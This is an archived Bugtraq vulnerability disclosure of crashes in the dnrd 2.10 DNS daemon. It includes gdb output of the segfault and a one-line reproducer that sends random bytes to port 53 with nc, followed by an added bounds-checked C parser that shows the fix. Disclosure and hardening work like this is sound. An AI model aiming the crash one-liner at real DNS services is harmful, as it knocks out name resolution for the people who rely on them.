7858528 2002-01-20 20:15 +1100  /77 lines/ Andrew Griffiths <andrewg@tasmail.com>
Sent by: joel@lysator.liu.se
Imported: 2002-01-22  01:14  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <20611>
Subject: dnrd 2.10 dos
------------------------------------------------------------
From: "Andrew Griffiths" <andrewg@tasmail.com>
To: bugtraq@securityfocus.com
Message-ID: <200201200915.g0K9FRT13130@franklin.nt.tas.gov.au>

Program: dnrd
Version: 2.10
Distro: n/a

Problem:

There are various problems with dnrd's DNS request and reply
functions that cause it to crash.

Reproduce:

Using two consoles, I did the following:

Terminal one got:

[andrewg@blackhole /data/audit/dnrd-2.10/src]$ gdb dnrd
GNU gdb 5.0rh-5 Red Hat Linux 7.1
Copyright 2001 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux".
(gdb) set arg -s 1.2.3.4 -d
(gdb) run
Starting program: /data/audit/dnrd-2.10/src/dnrd -d
[New Thread 1024 (LWP 3249)]
ERROR: Couldn't kill dnrd: No such process
Debug: cache low/high: 800/1000
Debug: initialising master DNS database
Debug: no master configuration: /etc/dnrd/master
Debug: initialising from /etc/hosts, domain= <none>
Debug: /etc/hosts: 3 records
Debug: Received DNS query for "..\SÖanx, 6h??ü-ÀC?Ï"?>" real ?
"?????£æ??@ÖwéÕËl?p?Û@??"

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 1024 (LWP 3249)]
parse_query (y=0xbffff140, msg=0xb4bffff7 <Address 0xb4bffff7 out of bounds>,
    len=1346377321) at dns.c:298
298         if (ntohs(((short int *) msg)[2]) == 0) {       /* C is nice. */

Note that the ? are various control characters that I couldn't paste
in, 'cause they are not printable and kept stuffing up vim.

While on terminal two, I did:

dd if=/dev/urandom bs=64 count=1 | nc -u 127.0.0.1 53 -w 1

At one stage I also had msg=0x2e2e2e2e <Address 0x2e2e2e2e out of
bounds>.

It's not just parse_query that has this problem, but also places like
get_objectname().


Exploit:
-=-=-=-=-

So far I haven't tried to exploit it, but given some of the stuff
that I've seen, I would not be surprised if it was.

Even if there was an exploit, it'd have to work out a way of getting
root in a chroot jail and a non-root acct.

Affected:
-=-=-=-=-

People who use this, or distros that do, such as smoothwall. :P


--
www.tasmail.com
(7858528) /Andrew Griffiths <andrewg@tasmail.com>/(Rewrapped)
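The crash in the report comes from parse_query reading header fields (the `((short int *) msg)[2]` at dns.c:298) and, per the poster, name labels in get_objectname(), without first checking that the datagram length covers them. The following is an added example, not dnrd's code, of how a DNS query parser can guard every read with the remaining length so a truncated or random datagram is rejected instead of dereferenced. The function names, the `dns_query` struct and the two sample datagrams are all constructed for this example.

```c
/* Added example (not dnrd's code): a bounds-checked reader for the fixed
 * 12-byte DNS header and the QNAME/QTYPE/QCLASS of the first question.
 * Every read below is guarded by the number of bytes still available, so
 * a datagram that is shorter than the header, or whose labels run past the
 * end of the buffer, returns an error instead of reading out of bounds. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define DNS_HDR_LEN   12
#define DNS_MAX_NAME  255   /* RFC 1035 limit on a name */
#define DNS_MAX_LABEL 63    /* RFC 1035 limit on a single label */

struct dns_query {
    uint16_t id;
    uint16_t flags;
    uint16_t qdcount;
    char     name[DNS_MAX_NAME + 1];  /* dotted presentation form */
    uint16_t qtype;
    uint16_t qclass;
};

/* Big-endian 16-bit read; the caller guarantees two bytes are available. */
static uint16_t rd16(const unsigned char *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* Returns 0 on success, -1 if the datagram is malformed or truncated. */
int parse_query_checked(const unsigned char *msg, size_t len, struct dns_query *q)
{
    size_t off, nlen = 0;
    memset(q, 0, sizeof *q);

    /* Header: require the whole 12-byte header before touching any field. */
    if (msg == NULL || len < DNS_HDR_LEN) return -1;
    q->id = rd16(msg); q->flags = rd16(msg + 2); q->qdcount = rd16(msg + 4);
    if (q->flags & 0x8000) return -1;   /* QR bit set: a response, not a query */
    if (q->qdcount != 1) return -1;     /* this example handles single-question queries */

    /* QNAME: a sequence of <length><label> pairs ending in a zero byte. */
    off = DNS_HDR_LEN;
    for (;;) {
        uint8_t lab;
        if (off >= len) return -1;      /* ran off the end before the terminator */
        lab = msg[off++];
        if (lab == 0) break;
        if (lab & 0xC0) return -1;      /* compression pointers are not valid in a query name */
        if (lab > DNS_MAX_LABEL) return -1;
        if (off + lab > len) return -1; /* label body would exceed the datagram */
        if (nlen + lab + 1 > DNS_MAX_NAME) return -1;  /* keep within the name buffer */
        if (nlen) q->name[nlen++] = '.';
        memcpy(q->name + nlen, msg + off, lab);
        nlen += lab; off += lab;
    }
    q->name[nlen] = '\0';

    /* QTYPE and QCLASS follow the name. */
    if (len - off < 4) return -1;
    q->qtype = rd16(msg + off); q->qclass = rd16(msg + off + 2);
    return 0;
}

/* Constructed sample datagrams (not captured traffic). */
static const unsigned char good_query[] = {
    0x12, 0x34, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    7, 'e', 'x', 'a', 'm', 'p', 'l', 'e', 3, 'c', 'o', 'm', 0,
    0x00, 0x01, 0x00, 0x01 };
/* The same query cut off inside the first label. */
static const unsigned char truncated_query[] = {
    0x12, 0x34, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    7, 'e', 'x', 'a' };

int demo_good(struct dns_query *q)
{ return parse_query_checked(good_query, sizeof good_query, q); }
int demo_truncated(void)
{ struct dns_query q; return parse_query_checked(truncated_query, sizeof truncated_query, &q); }
int demo_short(void)   /* fewer bytes than the header itself */
{ struct dns_query q; return parse_query_checked(good_query, 5, &q); }

int main(void)
{
    struct dns_query q;
    if (demo_good(&q) == 0)
        printf("ok: id=%#x name=%s qtype=%u qclass=%u\n", q.id, q.name, q.qtype, q.qclass);
    printf("truncated -> %d, short -> %d\n", demo_truncated(), demo_short());
    return 0;
}
```

The point of the length checks is that `len` comes from the recvfrom() return value and the packet content comes from the network, so neither the label lengths nor the counts in the header can be trusted to describe the bytes actually present; checking `off + lab > len` before each memcpy is what keeps a 64-byte random datagram from turning into an out-of-bounds read.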